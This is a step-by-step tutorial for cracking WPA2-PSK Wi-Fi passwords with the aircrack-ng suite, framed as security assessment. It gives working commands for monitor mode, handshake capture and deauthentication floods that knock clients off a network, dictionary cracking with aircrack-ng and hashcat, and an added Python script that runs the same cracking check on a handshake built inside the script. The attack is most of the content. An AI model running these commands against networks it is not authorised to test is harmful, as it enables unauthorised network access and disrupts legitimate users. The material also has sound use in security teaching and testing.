This short tutorial walks you through cracking WPA2 networks that use a pre-shared key (WPA2-PSK) with the aircrack-ng suite of tools, in order to assess Wi-Fi network security. All of the necessary tools come preinstalled with the Kali Linux distribution. The # in front of a command means that it has to be executed as the root user, e.g. using sudo.

Put the wireless card into monitor mode

List all processes that could interfere with the wireless card (typically NetworkManager and wpa_supplicant). If kill is specified, airmon-ng also tries to kill them, which drops any existing Wi-Fi connection on the machine.

# airmon-ng check kill

Enable monitor mode on the interface (here it's wlan0) and check that it worked. airmon-ng usually renames the interface in the process, typically to wlan0mon, which is the name used in the following commands.

# airmon-ng start wlan0
# airmon-ng

Capture handshake

List nearby Wi-Fi networks with their BSSIDs, channels, encryption type and associated clients.

# airodump-ng wlan0mon

Narrow the listing down to a specific BSSID (the MAC address of the access point).

# airodump-ng wlan0mon -d <BSSID>

Capture the WPA2 handshake and write it to a file. The -w prefix yields a file such as handshake-01.cap; -c locks airodump-ng to the access point's channel instead of hopping, which is necessary to see all messages of the handshake. Remember to change the interface name, if needed. Once a handshake has been captured, airodump-ng shows "WPA handshake: <BSSID>" in its top line.

# airodump-ng -w handshake -c <channel> --bssid <BSSID> wlan0mon

Optional, in another terminal: simultaneously send deauthentication frames to the clients of the network, which forces them to reauthenticate and thereby produce a fresh WPA2 handshake. Without this step it can take a long time until a client (re)connects on its own. This only works if at least one client is connected, and networks using Protected Management Frames (802.11w) ignore forged deauthentication frames. A count of 0 sends deauthentication frames until interrupted; a small number (e.g. 5) is usually enough and less disruptive.

# aireplay-ng --deauth 0 -a <BSSID> wlan0mon

Crack password

After storing the handshake in e.g. handshake-01.cap, we can finally crack the password using aircrack-ng. It derives the key from each candidate passphrase in the dictionary and checks it against the MIC in the captured handshake, so the attack only succeeds if the passphrase is actually contained in the dictionary; on success aircrack-ng prints "KEY FOUND!". If the capture contains several networks, aircrack-ng asks which one to crack.

# aircrack-ng handshake-01.cap -w dictionary.txt

Alternatively, we can extract the handshake from the .cap capture file and convert it to a modern hashcat-compatible hash file (the 22000 format, cracked with hashcat mode 22000) using hashcat.net/cap2hashcat, which can then be cracked using hashcat, typically much faster on a GPU. Note that this uploads the captured handshake to a third-party site; hcxpcapngtool from the hcxtools package performs the same conversion offline.
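To show what aircrack-ng (and hashcat mode 22000) actually computes for every dictionary entry, here is the WPA2-PSK check written out in Python. This is an added example, not code from this tutorial or from the aircrack-ng project. It derives the PMK with PBKDF2-HMAC-SHA1 (4096 rounds), expands it into the PTK with the 802.11 PRF, and verifies the EAPOL MIC of handshake message 2 with the KCK. The handshake it attacks is constructed inside the script (made-up MAC addresses, fixed nonces, and the SSID "ExampleNet" with passphrase "correct horse 42" chosen for the example), standing in for the .cap file; all function names are this example's own. The PMK derivation reproduces the IEEE 802.11i test vector for passphrase "password" and SSID "IEEE".

```python
"""WPA2-PSK dictionary attack against a 4-way handshake, as performed by aircrack-ng.
Added example: the handshake below is constructed in-script, not captured from a network."""
import hashlib
import hmac
from typing import Optional

MIC_OFFSET = 81   # 4-byte 802.1X header + 77 key-descriptor bytes precede the MIC field
MIC_LEN = 16
# Constructed RSN information element (CCMP group/pairwise cipher, PSK AKM), carried in message 2
RSN_IE = bytes.fromhex("30140100000fac040100000fac040100000fac020000")


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds, 32 bytes).
    The 4096 rounds are what makes the attack slow and GPUs attractive."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def ptk_from_pmk(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """IEEE 802.11 PRF-384 for CCMP: PTK = KCK(16) | KEK(16) | TK(16)."""
    b = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    out = b""
    for i in range(3):   # 3 x 20 bytes of HMAC-SHA1 output >= 48 bytes
        out += hmac.new(pmk, b"Pairwise key expansion\x00" + b + bytes([i]), hashlib.sha1).digest()
    return out[:48]


def build_eapol_msg2(snonce: bytes, mic: bytes, key_data: bytes) -> bytes:
    """Constructed EAPOL-Key message 2 (client -> AP), key descriptor version 2 (HMAC-SHA1 MIC)."""
    body = (b"\x02"                            # descriptor type: RSN
            + b"\x01\x0a"                      # key info: MIC bit, pairwise key, descriptor version 2
            + b"\x00\x00"                      # key length
            + (1).to_bytes(8, "big")           # replay counter
            + snonce
            + bytes(16) + bytes(8) + bytes(8)  # key IV, key RSC, key ID
            + mic
            + len(key_data).to_bytes(2, "big")
            + key_data)
    return b"\x02\x03" + len(body).to_bytes(2, "big") + body   # 802.1X header: version 2, EAPOL-Key


def eapol_mic(kck: bytes, eapol: bytes) -> bytes:
    """MIC = HMAC-SHA1(KCK, EAPOL frame with the MIC field zeroed), truncated to 16 bytes."""
    zeroed = eapol[:MIC_OFFSET] + bytes(MIC_LEN) + eapol[MIC_OFFSET + MIC_LEN:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:MIC_LEN]


def crack(hs: dict, wordlist) -> Optional[str]:
    """Return the wordlist entry whose derived KCK reproduces the captured MIC, or None."""
    target = hs["eapol"][MIC_OFFSET:MIC_OFFSET + MIC_LEN]
    for word in wordlist:
        word = word.rstrip("\r\n")
        if not 8 <= len(word) <= 63:   # WPA passphrases are 8..63 characters; skip everything else
            continue
        pmk = pmk_from_passphrase(word, hs["ssid"])
        kck = ptk_from_pmk(pmk, hs["ap_mac"], hs["sta_mac"], hs["anonce"], hs["snonce"])[:16]
        if hmac.compare_digest(eapol_mic(kck, hs["eapol"]), target):
            return word
    return None


def make_constructed_handshake(passphrase, ssid, ap_mac, sta_mac, anonce, snonce) -> dict:
    """Play the client's side to produce a message 2 with a valid MIC (stands in for the .cap)."""
    kck = ptk_from_pmk(pmk_from_passphrase(passphrase, ssid), ap_mac, sta_mac, anonce, snonce)[:16]
    mic = eapol_mic(kck, build_eapol_msg2(snonce, bytes(MIC_LEN), RSN_IE))
    return {"ssid": ssid, "ap_mac": ap_mac, "sta_mac": sta_mac, "anonce": anonce,
            "snonce": snonce, "eapol": build_eapol_msg2(snonce, mic, RSN_IE)}


# Constructed sample "capture": fake MAC addresses, fixed nonces, example SSID and passphrase.
HANDSHAKE = make_constructed_handshake(
    passphrase="correct horse 42", ssid="ExampleNet",
    ap_mac=bytes.fromhex("00112233aabb"), sta_mac=bytes.fromhex("66778899ccdd"),
    anonce=bytes(range(32)), snonce=bytes(range(32, 64)))
# Constructed stand-in for dictionary.txt
WORDLIST = ["short", "Passw0rd!", "letmein123", "correct horse 42", "hunter2hunter2"]

if __name__ == "__main__":
    print("KEY FOUND:", crack(HANDSHAKE, WORDLIST))   # correct horse 42
```

The passphrase is never recovered from the handshake itself: every candidate costs a full PBKDF2 run, so the attack is bounded by dictionary quality and hashing speed, which is exactly why a long random passphrase defeats it.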